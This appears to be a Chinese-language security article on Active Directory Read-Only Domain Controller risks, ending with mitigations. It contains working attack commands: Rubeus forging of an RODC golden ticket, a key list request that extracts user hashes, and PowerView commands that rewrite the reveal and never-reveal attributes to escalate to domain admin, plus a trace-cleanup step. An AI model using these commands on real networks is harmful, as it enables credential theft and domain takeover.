只讀域控制器（RODC）是一種微軟 Windows Server操作系統(tǒng)的角色，它提供了一種安全的方式來將Active Directory服務擴展到安全較低的網(wǎng)絡邊緣。RODC只允許只讀訪問，不允許對 Active Directory的數(shù)據(jù)進行修改，這使得它們成為支持遠程辦公、分布式辦公和邊緣部署等場景的理想選擇。

然而，與任何安全策略一樣，RODC也存在一些潛在的安全風險。在使用RODC 時，需要認真考慮安全因素，并采取適當?shù)拇胧﹣砭徑膺@些風險。在本文中，我們將探討 RODC 的安全風險，并提供一些防范措施，以確保其安全性。

RODC中的管理員

RODC ManagedBy屬性值可以用于指定RODC的管理員，這樣可以確保只有授權(quán)的用戶或組才能管理RODC。指定ManagedBy屬性值時，可以選擇指定一個用戶或組。當指定一個組時，該組中的成員都將被授予對RODC的管理權(quán)限。這樣可以簡化管理，避免逐個指定每個管理員。

當獲取了RODC ManagedBy屬性中列出的賬戶權(quán)限，就可以在RODC上擁有本地管理員權(quán)限。如果獲取了具有委派權(quán)限來修改RODC的ManagedBy屬性的賬戶權(quán)限，同樣也可以成為管理員。

因此，對于ManagedBy屬性值，必須進行適當?shù)墓芾砗捅Ｗo，以確保只有授權(quán)的用戶或組才能進行RODC的管理操作。同時，也需要定期審查ManagedBy屬性值，以確保其仍然是最新的和正確的。

RODC中的身份驗證

在Windows Server 2008中引入RODC時，Microsoft強制規(guī)定RODC不得使用 Kerberos TGT加密。這是因為TGT是Active Directory中用于加密用戶身份驗證憑據(jù)的關(guān)鍵密鑰之一。如果TGT的密鑰被泄露，攻擊者就可以使用該密鑰解密用戶身份驗證憑據(jù)，從而獲取用戶的用戶名和密碼。

為了加強安全性，RODC引入了一種新的加密機制：不可逆轉(zhuǎn)的密碼加密。該機制使用一個密碼復制策略來控制RODC緩存的用戶密碼。密碼復制策略由域管理員在Active Directory中配置，并指定哪些用戶的密碼可以被RODC緩存，以及在RODC上緩存的密碼是否可被解密。只有在密碼復制策略明確允許的情況下，RODC才會緩存用戶密碼。這可以避免密碼被泄露，提高RODC的安全性。

為此，RODC還引入了兩個重要的屬性：msDS-RevealOnDemandGroup和msDS-NeverRevealGroup。

msDS-RevealOnDemandGroup屬性指定了一組可以在RODC上緩存其成員身份的安全組。如果用戶是該組的成員，RODC將在需要時向上級域控制器請求其身份信息，并將其緩存在本地。這可以提高身份驗證速度和效率。

msDS-NeverRevealGroup屬性指定了一組不允許在RODC上緩存其成員身份的安全組。如果用戶是該組的成員，則其身份信息將始終從上級域控制器請求，并不會緩存在RODC上。這可以保護敏感信息，避免在RODC上泄露。

其中后者的優(yōu)先級最高，當某用戶或組同時存在于兩個屬性當中，RODC無法檢索其憑據(jù)。

進行身份驗證時，RODC需要訪問用戶和計算機的憑據(jù)來在本地對它們進行身份驗證。每個RODC都有一個特定的主體列表，它被指定為要認證的主體，并因此允許檢索其憑據(jù)。這個列表存儲在RODC的機器賬戶的msDS-RevealOnDemandGroup屬性中。

在認證用戶或計算機之后需要生成TGT，而RODC并不能使用域中kertgt密鑰來對TGT進行加密和簽名，因此當某服務器提升為RODC的時候，AD域會創(chuàng)建一個新的krbtgt賬戶，此用戶被分配一個五位數(shù)的密鑰版本號，同時此賬號的名稱為krbtgt_xxxxx，此賬號的名稱可以在RODC機器賬戶的msDS-KrbTgtLink屬性中找到，而五位數(shù)的密鑰版本號和機器賬戶的名稱可以在新的KRBTGT帳戶的msDS-SecondaryKrbTgtNumber和msDS-KrbTgtLinkBl屬性中找到。

• 
  

PS > Get-ADComputer RODC -Properties msDS-KrbTgtLink

• 
  

PS > Get-ADUser krbtgt_23165 -Properties msDS-SecondaryKrbTgtNumber,msDS-KrbTGTLinkBl

RODC黃金票據(jù)

當獲得RODC管理員權(quán)限時，可以dump緩存在RODC中的憑據(jù)，例如krbtgt憑據(jù)，因此可以偽造一個RODC的黃金票據(jù)。

使用Rubeus來創(chuàng)建一個黃金票據(jù)，rodcNumber代表RODC中krbtgt的密鑰版本號，aes256代表RODC krbtgt用戶的密鑰，id為要制作票據(jù)用戶的rid，最后還需要域名和域內(nèi)sid的值。

Rubeus.exe golden /rodcNumber:23165 /aes256:eacd894dd0d93...7a0ebbfa64c7545 /user:administrator

/id:500 /domain:test.com?

/sid:S-1-5-21-1281121768-1524864103-2976670869

密鑰列表攻擊

之后將這個黃金票據(jù)用于向域控發(fā)送kebtgt服務的TGS-REQ，TGS-REQ包含“Key List Request”(KERB-KEY-LIST-REQ)，KERB-KEY-LIST-REQ?結(jié)構(gòu)用于請求KDC 可以提供給客戶端的密鑰類型列表。

如果目標賬戶在RODC的msDS-RevealOnDemandGroup屬性中且不在msDS-NeverRevealGroup屬性中，TGS-REP將返回一個包含目標用戶憑證的KERB-KEY-LIST-REP結(jié)構(gòu)，解密后，可以獲得其hash從而進行hash傳遞攻擊。

下面由rubeus工具和上面制作的票據(jù)來完成key list攻擊：

• 
  

Rubeus.exe asktgs /enctype:aes256 /keyList /service:krbtgt/dc.relay.com /dc:dc.relay.com /ticket:doIFgzCCBX+gAwIBBaEDA.....

域內(nèi)權(quán)限提升

經(jīng)過上面的描述可以看出，當獲取到RODC的本地管理員權(quán)限時，可以獲取到在msDS-RevealOnDemandGroup屬性中而不在msDS-NeverRevealGroup屬性中的用戶，因此，如果我們可以操作這兩個屬性，就可以加入administrator賬戶，實現(xiàn)提權(quán)。

具體過程：

1.首先將域管理員賬戶添加到msDS-RevealOnDemandGroup 屬性中。

• 
  

PS > Set-DomainObject -Identity RODC$ -Set @{'msDS-RevealOnDemandGroup'=@('CN=Allowed RODC Password Replication Group,CN=Users,DC=relay,DC=com', ' CN=Administrator,CN=Users,DC=relay,DC=com')}

2.然后將msDS-NeverRevealGroup 屬性直接清空。

• 
  

PS > Set-DomainObject -Identity RODC$ -Clear 'msDS-NeverRevealGroup'

3.通過修改ManagedBy屬性，獲得RODC的特權(quán)訪問以獲取緩存憑據(jù)的訪問權(quán)限。

4.之后跟前面提到的一樣，偽造目標賬戶的RODC TGT，并請求key list attack攻擊，獲取到域管理員憑據(jù)。

5.最后進行清理痕跡，還原RODC的msDS-RevealOnDemandGroup和msDS-NeverRevealGroup的屬性值。

這種方法與key list attack的區(qū)別就是此權(quán)限提升方式需要具備更改寫入RODC msDS-RevealOnDemandGroup等屬性的權(quán)限，即GenericWrite，GenericAll，WriteDacl，Owns，WriteOwner，WriteProperty等訪問權(quán)限。

總結(jié)

總結(jié)來說，RODC雖然具有許多優(yōu)點，但與可寫DC可能存在相同的安全風險等級，因此RODC和可寫DC一樣需要采取適當?shù)陌踩胧﹣肀ＷoRODC，以確保它的安全使用。這包括在RODC上實施最小權(quán)限原則、定期進行安全審計、強制實施復雜的密碼策略等。

另外針對本文講解的相關(guān)攻擊手法，可以采用如下措施幫助緩解：

1.審核所有RODC的msDS-RevealOnDemandGroup屬性，確保它不包含任何域管理員組賬戶。

2.將所有管理員組賬戶添加到Denied RODC密碼復制組，并將該組添加到所有RODC的msDS-NeverRevealGroup屬性中。